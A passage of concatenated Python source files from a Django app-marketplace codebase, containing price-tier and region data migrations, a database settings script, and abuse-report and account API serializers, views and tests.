'6.99': {'CO': {'currency': 'COP',
'price': '14600.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '6.59',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '26.99',
'region': 11},
'US': {'currency': 'USD',
'price': '6.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '6.99',
'region': 10}},
'9.99': {'CO': {'currency': 'COP',
'methods': [],
'price': '20840.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '9.49',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '38.79',
'region': 11},
'US': {'currency': 'USD',
'price': '9.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '9.99',
'region': 10}}
}
# This is because method gets added on to the model later.
class FrozenPriceCurrency(amo.models.ModelBase):
carrier = models.IntegerField()
currency = models.CharField(max_length=10)
price = models.DecimalField(max_digits=10, decimal_places=2)
provider = models.IntegerField()
region = models.IntegerField(default=1)
tier = models.ForeignKey(Price)
class Meta:
db_table = 'price_currency'
def run():
FrozenPriceCurrency.objects.no_cache().all().delete()
for k in sorted(tiers.keys()):
v = tiers[k]
try:
tier = Price.objects.filter(price=k).no_transforms()[0]
except IndexError:
print 'Tier does not exist: {0}'.format(k)
continue
for country, values in v.items():
FrozenPriceCurrency.objects.create(
tier=tier,
carrier=None,
provider=1,
price=values['price'],
region=values['region'],
currency=values['currency']
)
print 'Creating: {0}, {1}'.format(k, country)
########NEW FILE########
__FILENAME__ = 609-rereviewtheme-fix
#!/usr/bin/env python
import logging
from addons.models import Addon
from editors.models import RereviewQueueTheme
log = logging.getLogger('z.task')
def run():
"""Delete RereviewQueueTheme objects whose themes did not cascade delete
with add-on. Came about from setting on_delete to invalid value in
model."""
for rqt in RereviewQueueTheme.objects.all():
try:
rqt.theme.addon
except Addon.DoesNotExist:
log.info('[Theme %s] Deleting rereview_queue_theme,'
' add-on does not exist.' % rqt.theme.id)
rqt.delete()
########NEW FILE########
__FILENAME__ = 611-add-payment-method
from constants.payments import PAYMENT_METHOD_CARD, PAYMENT_METHOD_OPERATOR
from market.models import Price, PriceCurrency
from mkt.regions import SPAIN, PL, CO, VE
tiers = {
'0.10': {SPAIN.id: {'method': PAYMENT_METHOD_OPERATOR},
PL.id: {'method': PAYMENT_METHOD_OPERATOR},
VE.id: {'method': PAYMENT_METHOD_CARD}},
'0.25': {SPAIN.id: {'method': PAYMENT_METHOD_OPERATOR},
PL.id: {'method': PAYMENT_METHOD_OPERATOR},
VE.id: {'method': PAYMENT_METHOD_CARD}},
'0.50': {SPAIN.id: {'method': PAYMENT_METHOD_OPERATOR},
PL.id: {'method': PAYMENT_METHOD_OPERATOR},
VE.id: {'method': PAYMENT_METHOD_CARD}},
'0.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
'1.99': {CO.id: {'method': PAYMENT_METHOD_CARD},
VE.id: {'method': PAYMENT_METHOD_CARD}},
'2.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
'3.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
'4.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
'6.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
'9.99': {VE.id: {'method': PAYMENT_METHOD_CARD},
CO.id: {'method': PAYMENT_METHOD_CARD}},
'12.49': {VE.id: {'method': PAYMENT_METHOD_CARD},
CO.id: {'method': PAYMENT_METHOD_CARD}},
'14.99': {PL.id: {'method': PAYMENT_METHOD_CARD},
CO.id: {'method': PAYMENT_METHOD_CARD},
VE.id: {'method': PAYMENT_METHOD_CARD}},
'19.99': {PL.id: {'method': PAYMENT_METHOD_CARD},
CO.id: {'method': PAYMENT_METHOD_CARD},
VE.id: {'method': PAYMENT_METHOD_CARD}},
'24.99': {PL.id: {'method': PAYMENT_METHOD_CARD},
CO.id: {'method': PAYMENT_METHOD_CARD},
VE.id: {'method': PAYMENT_METHOD_CARD}},
'29.99': {PL.id: {'method': PAYMENT_METHOD_CARD},
CO.id: {'method': PAYMENT_METHOD_CARD},
VE.id: {'method': PAYMENT_METHOD_CARD}},
'39.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
'49.99': {VE.id: {'method': PAYMENT_METHOD_CARD}},
}
def run():
for k in sorted(tiers.keys()):
v = tiers[k]
try:
tier = Price.objects.get(price=k)
except Price.DoesNotExist:
print 'Tier does not exist: {0}'.format(k)
continue
for region, values in v.items():
try:
currency = PriceCurrency.objects.get(tier=tier, region=region)
except PriceCurrency.DoesNotExist:
print 'Region does not exist: {0}'.format(region)
continue
currency.method = values['method']
currency.save()
print 'Updating: {0}, {1}, {2}'.format(k, region, values['method'])
########NEW FILE########
__FILENAME__ = 612-fixup-columbia
from constants.payments import PAYMENT_METHOD_CARD
from market.models import Price, PriceCurrency
from mkt.constants import regions
def run():
for tier in ['0.10', '0.25', '0.50']:
try:
pc = PriceCurrency.objects.get(tier__price=tier,
region=regions.CO.id)
except PriceCurrency.DoesNotExist:
print 'Skipping deleting PriceCurrency of {0} for CO'.format(tier)
continue
pc.delete()
print 'Deleted PriceCurrency of {0} for CO'.format(tier)
for tier, amount in [('14.99', '31280.00'),
('19.99', '41720.00'),
('24.99', '52160.00')]:
try:
price = Price.objects.get(price=tier)
except Price.DoesNotExist:
print 'Skipping adding in {0} for CO'.format(tier)
continue
if not PriceCurrency.objects.filter(tier=price,
region=regions.CO.id).exists():
PriceCurrency.objects.create(region=regions.CO.id, currency='COP',
price=amount, carrier=None,
provider=1, tier=price)
print 'Created {0} for CO'.format(tier)
for tier in ['6.99', '9.99', '12.49', '14.99', '19.99', '24.99', '29.99']:
try:
pc = PriceCurrency.objects.get(tier__price=tier,
region=regions.CO.id)
except PriceCurrency.DoesNotExist:
print 'Skipping modifying PriceCurrency of {0} for CO'.format(tier)
continue
pc.method = PAYMENT_METHOD_CARD
pc.save()
print 'Updated {0} for CO to card'.format(tier)
########NEW FILE########
__FILENAME__ = 620-add-mobile-profile
import amo
from mkt.webapps.models import AppFeatures, Webapp
def run():
"""Update feature profiles for mobile-only apps requiring qHD."""
apps = (Webapp.objects
.filter(addondevicetype__device_type__in=[amo.DEVICE_MOBILE.id,
amo.DEVICE_GAIA.id])
.exclude(addondevicetype__device_type__in=[amo.DEVICE_TABLET.id,
amo.DEVICE_DESKTOP.id]))
for app in apps:
for version in app.versions.all():
af, _ = AppFeatures.objects.get_or_create(version=version)
af.update(has_qhd=True)
print('Marked mobile-only app "%s" (version %s) as '
'requiring a qHD device' % (app, version))
########NEW FILE########
__FILENAME__ = 625-override-outdated-jetpack-compat
def run():
return
########NEW FILE########
__FILENAME__ = 626-override-outdated-jetpack-compat
import amo
from addons.models import Addon, CompatOverride, CompatOverrideRange
def run():
addons = (Addon.objects
.filter(type=amo.ADDON_EXTENSION, appsupport__app=amo.FIREFOX.id,
_current_version__files__jetpack_version__isnull=False)
.exclude(_current_version__files__jetpack_version='1.14'))
# Fix invalid compat ranges from last migration
(CompatOverrideRange.objects.filter(
compat__addon__in=addons, type=1, app_id=amo.FIREFOX.id,
min_app_version='0', max_app_version='21.*', min_version='0')
.delete())
count = 0
for addon in addons:
co, created = CompatOverride.objects.get_or_create(addon=addon,
guid=addon.guid,
name=addon.name)
CompatOverrideRange.objects.create(
compat=co, type=1, app_id=amo.FIREFOX.id,
min_app_version='21.*', max_app_version='*',
min_version='0', max_version=addon.current_version.version)
count += 1
print('Overrode compatibility for %d SDK add-ons.' % count)
########NEW FILE########
__FILENAME__ = 642-encrypt-secret
from datetime import datetime
import amo
from aesfield.field import AESField
class FrozenAPIAccess(amo.models.ModelBase):
secret = AESField(max_length=255, aes_key='api:access:secret')
class Meta:
db_table = 'api_access'
def run():
for access in FrozenAPIAccess.objects.all():
access.secret = str(access.secret)
if not access.created:
access.created = datetime.now()
access.save()
########NEW FILE########
__FILENAME__ = 645-collection-backfill-slugs
from mkt.collections.models import Collection
def run():
"""Backfill slugs."""
for c in Collection.objects.all():
c.save()
########NEW FILE########
__FILENAME__ = 653-backfill-app-install-counts
import datetime
from stats.models import GlobalStat
from mkt.monolith.models import MonolithRecord
METRIC = 'apps_count_installed'
def run():
"""Backfill apps_count_installed."""
# Get the first metric and increment daily until today's date.
today = datetime.datetime.today().replace(hour=0, minute=0, second=0,
microsecond=0)
try:
date = (MonolithRecord.objects.order_by('recorded')
.values('recorded')[0]['recorded']).replace(
hour=0, minute=0, second=0, microsecond=0)
except IndexError:
return # No monolith data. Bail out.
while date < today:
next_date = date + datetime.timedelta(days=1)
# Delete the old stats for this date.
GlobalStat.objects.filter(name=METRIC, date=date.date()).delete()
# Add it back with the count from the Monolith table.
count = MonolithRecord.objects.filter(recorded__range=(date,
next_date),
key='install').count()
GlobalStat.objects.create(name=METRIC, date=date.date(), count=count)
date = next_date
########NEW FILE########
__FILENAME__ = 654-award-theme-points
#!/usr/bin/env python
def run():
return
########NEW FILE########
__FILENAME__ = 659-award-theme-points
#!/usr/bin/env python
def run():
return
########NEW FILE########
__FILENAME__ = 661-award-theme-points
#!/usr/bin/env python
import datetime
from django.db.models import Q
import amo
from amo.utils import chunked
from devhub.models import ActivityLog
from mkt.reviewers.tasks import _batch_award_points
import mkt.constants.reviewers as rvw
def run():
"""
Retroactively award theme reviewer points for all the theme
reviewers done since the Great Theme Migration to amo up to
when we started recording points.
"""
start_date = datetime.date(2013, 8, 27)
# Get theme reviews that are approves and rejects from before we started
# awarding.
approve = '"action": %s' % rvw.ACTION_APPROVE
reject = '"action": %s' % rvw.ACTION_REJECT
al = ActivityLog.objects.filter(
Q(_details__contains=approve) | Q(_details__contains=reject),
action=amo.LOG.THEME_REVIEW.id, created__lte=start_date)
for chunk in chunked(al, 50):
# Review and thou shall receive.
_batch_award_points.delay(chunk)
########NEW FILE########
__FILENAME__ = 662-modify-existing-region-exclusions
#!/usr/bin/env python
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError
import mkt
from mkt.developers.cron import exclude_new_region
from mkt.webapps.models import AddonExcludedRegion
from mkt.zadmin.models import FeaturedAppRegion
def run():
"""
Migrate from New Mexico to Old Mexico. Then add AddonExcludedRegion
objects for those apps that opted out of being added to new regions.
"""
# There were two Mexicos (12 is the first; 18 was the second one).
for aer in AddonExcludedRegion.objects.filter(region=18):
try:
aer.update(region=mkt.regions.MX.id)
print 'OK: %s New Mexico -> Old Mexico' % aer.id
except (IntegrityError, ObjectDoesNotExist):
print 'SKIP: %s New Mexico -> Old Mexico' % aer.id
# And the featured apps, if there were any.
for far in FeaturedAppRegion.objects.filter(region=18):
try:
far.update(region=mkt.regions.MX.id)
print 'OK: %s New Mexico -> Old Mexico' % far.id
except (IntegrityError, ObjectDoesNotExist):
print 'SKIP: %s New Mexico -> Old Mexico' % far.id
# New regions were added.
exclude_new_region([
mkt.regions.MX,
mkt.regions.HU,
mkt.regions.DE,
mkt.regions.ME,
mkt.regions.RS,
mkt.regions.GR,
])
########NEW FILE########
__FILENAME__ = 675-remove-captions-from-webapp-previews
#!/usr/bin/env python
import amo
from addons.models import Preview
from translations.models import delete_translation
def run():
"""
Remove captions from Webapp Previews.
"""
# This should be done in a separate script, it's taking too long to be
# a migration, and it doesn't need to be done as soon as we have deployed,
# it can be done later.
pass
# for prev in Preview.objects.filter(
# addon__type=amo.ADDON_WEBAPP,
# caption__isnull=False).no_transforms().no_cache().iterator():
# delete_translation(prev, 'caption')
########NEW FILE########
__FILENAME__ = schematic_settings
import sys
import os
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Set up zamboni.
import manage # noqa
from django.conf import settings
config = settings.DATABASES['default']
config['HOST'] = config.get('HOST', 'localhost')
config['PORT'] = config.get('PORT', '3306')
if not config['HOST'] or config['HOST'].endswith('.sock'):
""" Oh you meant 'localhost'! """
config['HOST'] = 'localhost'
s = 'mysql --silent {NAME} -h{HOST} -u{USER}'
if config['PASSWORD']:
os.environ['MYSQL_PWD'] = config['PASSWORD']
del config['PASSWORD']
if config['PORT']:
s += ' -P{PORT}'
else:
del config['PORT']
db = s.format(**config)
table = 'schema_version'
handlers = {'.py': sys.executable + ' -B manage.py runscript migrations.%s'}
########NEW FILE########
__FILENAME__ = forms
from django import forms
from users.models import UserProfile
from mkt.api.forms import SluggableModelChoiceField
from mkt.site.forms import AbuseForm
from mkt.webapps.models import Webapp
class UserAbuseForm(AbuseForm):
user = forms.ModelChoiceField(queryset=UserProfile.objects.all())
class AppAbuseForm(AbuseForm):
app = SluggableModelChoiceField(queryset=Webapp.objects.all(),
sluggable_to_field_name='app_slug')
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from abuse.models import AbuseReport
from mkt.account.serializers import UserSerializer
from mkt.api.fields import SlugOrPrimaryKeyRelatedField, SplitField
from mkt.webapps.serializers import SimpleAppSerializer
from mkt.webapps.models import Webapp
class BaseAbuseSerializer(serializers.ModelSerializer):
text = serializers.CharField(source='message')
ip_address = serializers.CharField(required=False)
reporter = SplitField(serializers.PrimaryKeyRelatedField(required=False),
UserSerializer())
def save(self, force_insert=False):
serializers.ModelSerializer.save(self)
del self.data['ip_address']
return self.object
class UserAbuseSerializer(BaseAbuseSerializer):
user = SplitField(serializers.PrimaryKeyRelatedField(), UserSerializer())
class Meta:
model = AbuseReport
fields = ('text', 'ip_address', 'reporter', 'user')
class AppAbuseSerializer(BaseAbuseSerializer):
app = SplitField(
SlugOrPrimaryKeyRelatedField(source='addon', slug_field='app_slug',
queryset=Webapp.objects.all()),
SimpleAppSerializer(source='addon'))
class Meta:
model = AbuseReport
fields = ('text', 'ip_address', 'reporter', 'app')
########NEW FILE########
__FILENAME__ = test_views
import json
import urllib
from django.core import mail
from django.core.urlresolvers import reverse
from nose.tools import eq_
from abuse.models import AbuseReport
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from users.models import UserProfile
class BaseTestAbuseResource(object):
"""
Setup for AbuseResource tests that require inheritance from TestCase.
"""
resource_name = None
def setUp(self):
super(BaseTestAbuseResource, self).setUp()
self.list_url = reverse('%s-abuse-list' % (self.resource_name,))
self.headers = {
'REMOTE_ADDR': '48.151.623.42'
}
class AbuseResourceTests(object):
"""
Setup for AbuseResource tests that do not require inheritance from
TestCase.
Separate from BaseTestAbuseResource to ensure that test_* methods of this
abstract base class are not discovered by the runner.
"""
default_data = None
def _call(self, anonymous=False, data=None):
post_data = self.default_data.copy()
if data:
post_data.update(data)
client = self.anon if anonymous else self.client
res = client.post(self.list_url, data=urllib.urlencode(post_data),
content_type='application/x-www-form-urlencoded',
**self.headers)
try:
res_data = json.loads(res.content)
# Pending #855817, some errors will return an empty response body.
except ValueError:
res_data = res.content
return res, res_data
def _test_success(self, res, data):
"""
Tests common when looking to ensure complete successful responses.
"""
eq_(201, res.status_code)
fields = self.default_data.copy()
del fields['sprout']
if 'user' in fields:
eq_(data.pop('user')['display_name'], self.user.display_name)
del fields['user']
if 'app' in fields:
eq_(int(data.pop('app')['id']), self.app.pk)
del fields['app']
for name in fields.keys():
eq_(fields[name], data[name])
newest_report = AbuseReport.objects.order_by('-id')[0]
eq_(newest_report.message, data['text'])
eq_(len(mail.outbox), 1)
assert self.default_data['text'] in mail.outbox[0].body
def test_get(self):
res = self.client.get(self.list_url)
eq_(res.status_code, 405)
def test_send(self):
res, data = self._call()
self._test_success(res, data)
assert 'display_name' in data['reporter']
def test_send_anonymous(self):
res, data = self._call(anonymous=True)
self._test_success(res, data)
eq_(data['reporter'], None)
def test_send_potato(self):
tuber_res, tuber_data = self._call(data={'tuber': 'potat-toh'},
anonymous=True)
potato_res, potato_data = self._call(data={'sprout': 'potat-toh'},
anonymous=True)
eq_(tuber_res.status_code, 400)
eq_(potato_res.status_code, 400)
class TestUserAbuseResource(AbuseResourceTests, BaseTestAbuseResource, RestOAuth):
resource_name = 'user'
def setUp(self):
super(TestUserAbuseResource, self).setUp()
self.user = UserProfile.objects.get(pk=2519)
self.default_data = {
'text': '@cvan is very abusive.',
'sprout': 'potato',
'user': self.user.pk
}
def test_invalid_user(self):
res, data = self._call(data={'user': '-1'})
eq_(400, res.status_code)
assert 'Invalid' in data['user'][0]
class TestAppAbuseResource(AbuseResourceTests, BaseTestAbuseResource, RestOAuth):
fixtures = RestOAuth.fixtures + fixture('webapp_337141')
resource_name = 'app'
def setUp(self):
super(TestAppAbuseResource, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.default_data = {
'text': "@cvan's app is very abusive.",
'sprout': 'potato',
'app': self.app.pk
}
def test_invalid_app(self):
res, data = self._call(data={'app': -1})
eq_(400, res.status_code)
assert 'does not exist' in data['app'][0]
def test_slug_app(self):
res, data = self._call(data={'app': self.app.app_slug})
eq_(201, res.status_code)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework.routers import SimpleRouter
from mkt.abuse.views import AppAbuseViewSet, UserAbuseViewSet
abuse = SimpleRouter()
abuse.register('user', UserAbuseViewSet, base_name='user-abuse')
abuse.register('app', AppAbuseViewSet, base_name='app-abuse')
api_patterns = patterns('',
url('^abuse/', include(abuse.urls)),
)
########NEW FILE########
__FILENAME__ = views
from rest_framework import generics, viewsets
from rest_framework.permissions import AllowAny
from rest_framework.throttling import UserRateThrottle
from mkt.abuse.serializers import AppAbuseSerializer, UserAbuseSerializer
from mkt.api.authentication import (RestOAuthAuthentication,
RestAnonymousAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import check_potatocaptcha, CORSMixin
class AbuseThrottle(UserRateThrottle):
THROTTLE_RATES = {
'user': '30/hour',
}
class BaseAbuseViewSet(CORSMixin, generics.CreateAPIView,
viewsets.GenericViewSet):
cors_allowed_methods = ['post']
throttle_classes = (AbuseThrottle,)
throttle_scope = 'user'
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
permission_classes = (AllowAny,)
def create(self, request, *args, **kwargs):
fail = check_potatocaptcha(request.DATA)
if fail:
return fail
# Immutable? *this* *is* PYYYYTHONNNNNNNNNN!
request.DATA._mutable = True
if request.amo_user:
request.DATA['reporter'] = request.amo_user.pk
else:
request.DATA['reporter'] = None
request.DATA['ip_address'] = request.META.get('REMOTE_ADDR', '')
return super(BaseAbuseViewSet, self).create(request, *args, **kwargs)
def post_save(self, obj, created=False):
obj.send()
class AppAbuseViewSet(BaseAbuseViewSet):
serializer_class = AppAbuseSerializer
class UserAbuseViewSet(BaseAbuseViewSet):
serializer_class = UserAbuseSerializer
########NEW FILE########
__FILENAME__ = serializers
from functools import partial
from rest_framework import fields, serializers
from access import acl
from users.models import UserProfile
from mkt.api.serializers import PotatoCaptchaSerializer
class AccountSerializer(serializers.ModelSerializer):
class Meta:
model = UserProfile
fields = ('display_name',)
def validate_display_name(self, attrs, source):
"""Validate that display_name is not empty"""
value = attrs.get(source)
if value is None or not value.strip():
raise serializers.ValidationError("This field is required")
return attrs
def transform_display_name(self, obj, value):
"""Return obj.name instead of display_name to handle users without
a valid display_name."""
return obj.name
class FeedbackSerializer(PotatoCaptchaSerializer):
feedback = fields.CharField()
platform = fields.CharField(required=False)
chromeless = fields.CharField(required=False)
from_url = fields.CharField(required=False)
user = fields.Field()
def validate(self, attrs):
attrs = super(FeedbackSerializer, self).validate(attrs)
if not attrs.get('platform'):
attrs['platform'] = self.request.GET.get('dev', '')
attrs['user'] = self.request.amo_user
return attrs
class LoginSerializer(serializers.Serializer):
assertion = fields.CharField(required=True)
audience = fields.CharField(required=False)
is_mobile = fields.BooleanField(required=False, default=False)
class NewsletterSerializer(serializers.Serializer):
email = fields.EmailField()
class PermissionsSerializer(serializers.Serializer):
permissions = fields.SerializerMethodField('get_permissions')
def get_permissions(self, obj):
request = self.context['request']
allowed = partial(acl.action_allowed, request)
permissions = {
'admin': allowed('Admin', '%'),
'developer': request.amo_user.is_developer,
'localizer': allowed('Localizers', '%'),
'lookup': allowed('AccountLookup', '%'),
'curator': allowed('Collections', 'Curate'),
'reviewer': acl.action_allowed(request, 'Apps', 'Review'),
'webpay': (allowed('Transaction', 'NotifyFailure')
and allowed('ProductIcon', 'Create')),
'stats': allowed('Stats', 'View'),
'revenue_stats': allowed('RevenueStats', 'View'),
}
return permissions
class UserSerializer(AccountSerializer):
"""
A wacky serializer type that unserializes PK numbers and
serializes user fields.
"""
resource_uri = serializers.HyperlinkedRelatedField(
view_name='account-settings', source='pk',
read_only=True)
class Meta:
model = UserProfile
fields = ('display_name', 'resource_uri')
########NEW FILE########
__FILENAME__ = test_utils_
from nose.tools import eq_
from test_utils import RequestFactory
import amo.tests
from mkt.constants import apps
from mkt.webapps.models import Installed, Webapp
from mkt.site.fixtures import fixture
from users.models import UserProfile
from ..utils import purchase_list
class TestUtils(amo.tests.TestCase):
# TODO: add some more tests for purchase_list.
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
self.user = UserProfile.objects.get(pk=2519)
self.app = Webapp.objects.get(pk=337141)
self.req = RequestFactory().get('/')
def _test(self, type, exists):
Installed.objects.create(user=self.user, addon=self.app,
install_type=type)
if exists:
eq_(list(purchase_list(self.req, self.user, None)[0].object_list),
[self.app])
else:
assert not purchase_list(self.req, self.user, None)[0].object_list
def test_user(self):
self._test(apps.INSTALL_TYPE_USER, True)
def test_developer(self):
self._test(apps.INSTALL_TYPE_DEVELOPER, True)
def test_reviewer(self):
self._test(apps.INSTALL_TYPE_REVIEWER, False)
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import collections
import json
import uuid
from urlparse import urlparse
from django.conf import settings
from django.core import mail
from django.core.urlresolvers import reverse
from django.http import QueryDict
from django.utils.http import urlencode
from mock import patch, Mock
from nose.tools import eq_, ok_
from amo.tests import TestCase, app_factory
from amo.utils import urlparams
from mkt.account.views import MineMixin
from mkt.api.tests.test_oauth import RestOAuth
from mkt.constants.apps import INSTALL_TYPE_REVIEWER
from mkt.site.fixtures import fixture
from mkt.webapps.models import Installed
from users.models import UserProfile
class TestPotatoCaptcha(object):
def _test_bad_api_potato_data(self, response, data=None):
if not data:
data = json.loads(response.content)
eq_(400, response.status_code)
ok_('non_field_errors' in data)
eq_(data['non_field_errors'], [u'Form could not be submitted.'])
class FakeResourceBase(object):
pass
class FakeResource(MineMixin, FakeResourceBase):
def __init__(self, pk, request):
self.kwargs = {'pk': pk}
self.request = request
class TestMine(TestCase):
fixtures = fixture('user_2519')
def setUp(self):
self.request = Mock()
self.request.amo_user = UserProfile.objects.get(id=2519)
@patch.object(FakeResourceBase, 'get_object', create=True)
def test_get_object(self, mocked_get_object):
r = FakeResource(999, self.request)
r.get_object()
eq_(r.kwargs['pk'], 999)
r = FakeResource('mine', self.request)
r.get_object()
eq_(r.kwargs['pk'], 2519)
class TestPermission(RestOAuth):
fixtures = fixture('user_2519', 'user_10482')
def setUp(self):
super(TestPermission, self).setUp()
self.get_url = reverse('account-permissions', kwargs={'pk': 2519})
self.user = UserProfile.objects.get(pk=2519)
def test_has_cors(self):
self.assertCORS(self.client.get(self.get_url), 'get')
def test_verbs(self):
self._allowed_verbs(self.get_url, ('get'))
def test_other(self):
self.get_url = reverse('account-permissions', kwargs={'pk': 10482})
eq_(self.client.get(self.get_url).status_code, 403)
def test_no_permissions(self):
res = self.client.get(self.get_url)
eq_(res.status_code, 200, res.content)
self.assertSetEqual(
['admin', 'developer', 'localizer', 'lookup', 'curator',
'reviewer', 'webpay', 'stats', 'revenue_stats'],
res.json['permissions'].keys()
)
ok_(not all(res.json['permissions'].values()))
def test_some_permission(self):
self.grant_permission(self.user, 'Localizers:%')
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
ok_(res.json['permissions']['localizer'])
def test_mine(self):
self.get_url = reverse('account-permissions', kwargs={'pk': 'mine'})
self.test_some_permission()
def test_mine_anon(self):
self.get_url = reverse('account-permissions', kwargs={'pk': 'mine'})
res = self.anon.get(self.get_url)
eq_(res.status_code, 403)
def test_publisher(self):
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
ok_(not res.json['permissions']['curator'])
def test_publisher_ok(self):
self.grant_permission(self.user, 'Collections:Curate')
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
ok_(res.json['permissions']['curator'])
def test_webpay(self):
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
ok_(not res.json['permissions']['webpay'])
def test_webpay_ok(self):
self.grant_permission(self.user, 'ProductIcon:Create')
self.grant_permission(self.user, 'Transaction:NotifyFailure')
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
ok_(res.json['permissions']['webpay'])
def test_stats(self):
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
ok_(not res.json['permissions']['stats'])
def test_stats_ok(self):
self.grant_permission(self.user, 'Stats:View')
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
ok_(res.json['permissions']['stats'])
def test_revenue_stats(self):
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
ok_(not res.json['permissions']['revenue_stats'])
def test_revenue_stats_ok(self):
self.grant_permission(self.user, 'RevenueStats:View')
res = self.client.get(self.get_url)
eq_(res.status_code, 200)
ok_(res.json['permissions']['revenue_stats'])
class TestAccount(RestOAuth):
fixtures = fixture('user_2519', 'user_10482', 'webapp_337141')
def setUp(self):
super(TestAccount, self).setUp()
self.url = reverse('account-settings', kwargs={'pk': 2519})
self.user = UserProfile.objects.get(pk=2519)
def test_has_cors(self):
self.assertCORS(self.client.get(self.url), 'get', 'patch', 'put')
def test_verbs(self):
self._allowed_verbs(self.url, ('get', 'patch', 'put'))
def test_not_allowed(self):
eq_(self.anon.get(self.url).status_code, 403)
def test_allowed(self):
res = self.client.get(self.url)
eq_(res.status_code, 200, res.content)
data = json.loads(res.content)
eq_(data['display_name'], self.user.display_name)
def test_other(self):
url = reverse('account-settings', kwargs={'pk': 10482})
eq_(self.client.get(url).status_code, 403)
def test_own(self):
url = reverse('account-settings', kwargs={'pk': 'mine'})
res = self.client.get(url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['display_name'], self.user.display_name)
def test_own_empty(self):
self.user.update(display_name='')
url = reverse('account-settings', kwargs={'pk': 'mine'})
res = self.client.get(url)
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['display_name'], self.user.username)
def test_patch(self):
res = self.client.patch(self.url,
data=json.dumps({'display_name': 'foo'}))
eq_(res.status_code, 200)
user = UserProfile.objects.get(pk=self.user.pk)
eq_(user.display_name, 'foo')
def test_patch_empty(self):
res = self.client.patch(self.url,
data=json.dumps({'display_name': None}))
eq_(res.status_code, 400)
data = json.loads(res.content)
eq_(data['display_name'], [u'This field is required'])
res = self.client.patch(self.url,
data=json.dumps({'display_name': ''}))
eq_(res.status_code, 400)
data = json.loads(res.content)
eq_(data['display_name'], [u'This field is required'])
def test_put(self):
res = self.client.put(self.url,
data=json.dumps({'display_name': 'foo'}))
eq_(res.status_code, 200)
user = UserProfile.objects.get(pk=self.user.pk)
eq_(user.display_name, 'foo')
eq_(user.username, self.user.username) # Did not change.
def test_patch_extra_fields(self):
res = self.client.patch(self.url,
data=json.dumps({'display_name': 'foo',
'username': 'bob'}))
eq_(res.status_code, 200)
user = UserProfile.objects.get(pk=self.user.pk)
eq_(user.display_name, 'foo') # Got changed successfully.
eq_(user.username, self.user.username) # Did not change.
def test_patch_other(self):
url = reverse('account-settings', kwargs={'pk': 10482})
res = self.client.patch(url, data=json.dumps({'display_name': 'foo'}))
eq_(res.status_code, 403)
class TestInstalled(RestOAuth):
fixtures = fixture('user_2519', 'user_10482', 'webapp_337141')
def setUp(self):
super(TestInstalled, self).setUp()
self.list_url = reverse('installed-apps')
self.user = UserProfile.objects.get(pk=2519)
def test_has_cors(self):
self.assertCORS(self.client.get(self.list_url), 'get')
def test_verbs(self):
self._allowed_verbs(self.list_url, ('get'))
def test_not_allowed(self):
eq_(self.anon.get(self.list_url).status_code, 403)
def test_installed(self):
ins = Installed.objects.create(user=self.user, addon_id=337141)
res = self.client.get(self.list_url)
eq_(res.status_code, 200, res.content)
data = json.loads(res.content)
eq_(data['meta']['total_count'], 1)
eq_(data['objects'][0]['id'], ins.addon.pk)
eq_(data['objects'][0]['user'],
{'developed': False, 'purchased': False, 'installed': True})
def test_installed_pagination(self):
ins1 = Installed.objects.create(user=self.user, addon=app_factory())
ins1.update(created=self.days_ago(1))
ins2 = Installed.objects.create(user=self.user, addon=app_factory())
ins2.update(created=self.days_ago(2))
ins3 = Installed.objects.create(user=self.user, addon=app_factory())
ins3.update(created=self.days_ago(3))
res = self.client.get(self.list_url, {'limit': 2})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 2)
eq_(data['objects'][0]['id'], ins1.addon.id)
eq_(data['objects'][1]['id'], ins2.addon.id)
eq_(data['meta']['total_count'], 3)
eq_(data['meta']['limit'], 2)
eq_(data['meta']['previous'], None)
eq_(data['meta']['offset'], 0)
next = urlparse(data['meta']['next'])
eq_(next.path, self.list_url)
eq_(QueryDict(next.query).dict(), {u'limit': u'2', u'offset': u'2'})
res = self.client.get(self.list_url, {'limit': 2, 'offset': 2})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 1)
eq_(data['objects'][0]['id'], ins3.addon.id)
eq_(data['meta']['total_count'], 3)
eq_(data['meta']['limit'], 2)
prev = urlparse(data['meta']['previous'])
eq_(next.path, self.list_url)
eq_(QueryDict(prev.query).dict(), {u'limit': u'2', u'offset': u'0'})
eq_(data['meta']['offset'], 2)
eq_(data['meta']['next'], None)
def test_installed_order(self):
# Should be reverse chronological order.
ins1 = Installed.objects.create(user=self.user, addon=app_factory())
ins1.update(created=self.days_ago(1))
ins2 = Installed.objects.create(user=self.user, addon=app_factory())
ins2.update(created=self.days_ago(2))
